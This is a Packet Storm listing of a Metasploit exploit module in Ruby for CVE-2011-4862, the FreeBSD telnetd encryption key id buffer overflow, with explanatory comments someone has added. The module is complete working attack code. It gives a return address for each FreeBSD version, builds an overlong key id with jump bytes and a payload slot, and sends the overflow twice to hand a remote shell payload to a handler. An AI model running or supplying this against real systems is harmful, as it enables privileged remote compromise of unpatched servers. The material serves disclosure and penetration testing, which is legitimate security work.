packetstormMetasploit.comPACKETSTORM:108198
HistoryDec 28, 2011 - 12:00 a.m.

FreeBSD Telnet Service Encyption Key ID Buffer Overflow

2011-12-2800:00:00
metasploit.com
packetstormsecurity.com
40

0.973 High

EPSS

Percentile

99.8%

`##  
# $Id: $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # Telnet mixin: presumably supplies connect / banner / sock / disconnect used
  # in exploit_target (its source is not part of this file — confirm).
  include Msf::Exploit::Remote::Telnet
  # BruteTargets: looks like it calls exploit_target(t) once per target entry
  # when 'Automatic' is selected (inferred from the mixin name — confirm).
  include Msf::Exploit::BruteTargets

  # Registers module metadata: description, references (CVE-2011-4862 /
  # BID 51182), payload constraints, and one 'Ret' address per FreeBSD
  # version. The per-version addresses are the only target-specific input
  # exploit_target reads.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow',
      'Description' => %q{
        This module exploits a buffer overflow in the encryption option handler of the
        FreeBSD telnet service.
      },
      'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['BID', '51182'],
          ['CVE', '2011-4862'],
          ['URL', 'http://www.exploit-db.com/exploits/18280/']
        ],
      'Privileged' => true,
      'Platform' => 'bsd',
      # 128 bytes is the room left for the encoded payload inside the
      # 400-byte key id built in exploit_target; 0x00 would terminate the
      # C string on the server side.
      'Payload' =>
        {
          'Space' => 128,
          'BadChars' => "\x00",
        },

      # Each entry is the address of a "call edx" gadget in that release's
      # telnetd binary (per the inline notes); 5.3 uses a direct return
      # instead. Binaries rebuilt with different options would shift these.
      'Targets' =>
        [
          [ 'Automatic', { } ],
          [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx
          [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx
          [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx
          [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx
          [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx
          [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx
          [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx
          [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx
          # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)
          [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return
          # Versions 5.2 and below do not support encryption
        ],
      'DefaultTarget' => 0,
      # NOTE(review): left empty here; the advisory date is not recorded in
      # the module itself.
      'DisclosureDate' => ''))
  end

  # Runs one attempt against a single target entry.
  #
  # Sequence: connect, negotiate the telnet ENCRYPT option, then send an
  # ENC_KEYID suboption whose body is far longer than the server's key-id
  # buffer (the overflow), twice. Returns early (without raising) if the
  # server stops answering after the first send; raises RuntimeError if
  # the server never acknowledges encryption support.
  #
  # Defensive note: the on-the-wire indicator is an ENCRYPT (option 0x26)
  # ENC_KEYID suboption several hundred bytes long, which no legitimate
  # client sends; patched telnetd rejects over-long key ids.
  #
  # @param t [Hash] target entry; only t['Ret'] is read
  # @raise [RuntimeError] when the ENCRYPT REPLY never arrives
  def exploit_target(t)

    connect
    # The banner is remote-controlled data; render it as hex/ASCII so
    # control bytes cannot reach the operator's terminal.
    banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
    print_status(banner_sanitized) if datastore['VERBOSE']

    # Telnet framing: IAC(0xff) SB(0xfa) ENCRYPT(0x26) ... IAC SE(0xff 0xf0).
    # enc_init carries the option-negotiation body (RFC 2946 layout —
    # presumably IS / DES_CFB64 followed by IV bytes; confirm against the RFC).
    enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
    # ENC_KEYID (0x07) sub-command: the handler for this is the overflowed one.
    enc_keyid = "\xff\xfa\x26\x07"
    end_suboption = "\xff\xf0"

    # Telnet protocol requires 0xff to be escaped with another
    penc = payload.encoded.gsub("\xff", "\xff\xff")

    # 400-byte key id; the server-side buffer is much smaller (size not
    # visible here). Fixed offsets below are tied to that layout.
    key_id = Rex::Text.rand_text_alphanumeric(400)
    key_id[ 0, 2] = "\xeb\x76"
    key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
    key_id[76, 4] = [ t['Ret'] ].pack("V")

    # Some of these bytes can get mangled, jump over them
    key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)

    # Bounce to the real payload (avoid corruption)
    key_id[120, 2] = "\xeb\x46"

    # The actual payload
    key_id[192, penc.length] = penc

    # Create the Key ID command
    sploit = enc_keyid + key_id + end_suboption

    # Initiate encryption
    sock.put(enc_init)

    # Wait for a successful response: loop until the server sends
    # IAC SB ENCRYPT REPLY(0x02) DES_CFB64(0x01). The rescue modifier
    # collapses a 5s timeout or socket error into nil, which becomes the
    # RuntimeError below, so a non-encrypting or silent server is reported
    # rather than attacked.
    loop do
      data = sock.get_once(-1, 5) rescue nil
      if not data
        raise RuntimeError, "This system does not support encryption"
      end
      break if data.index("\xff\xfa\x26\x02\x01")
    end

    # The first request smashes the pointer
    print_status("Sending first payload")
    sock.put(sploit)

    # Make sure the server replied to the first request
    data = sock.get_once(-1, 5)
    unless data
      print_status("Server did not respond to first payload")
      return
    end

    # Some delay between each request seems necessary in some cases
    # (IO.select with no descriptors is used as a 0.5s sleep).
    ::IO.select(nil, nil, nil, 0.5)

    # The second request results in the pointer being called
    print_status("Sending second payload...")
    sock.put(sploit)

    # Hand off to the payload handler before tearing the session down.
    handler

    ::IO.select(nil, nil, nil, 0.5)
    disconnect
  end

end
`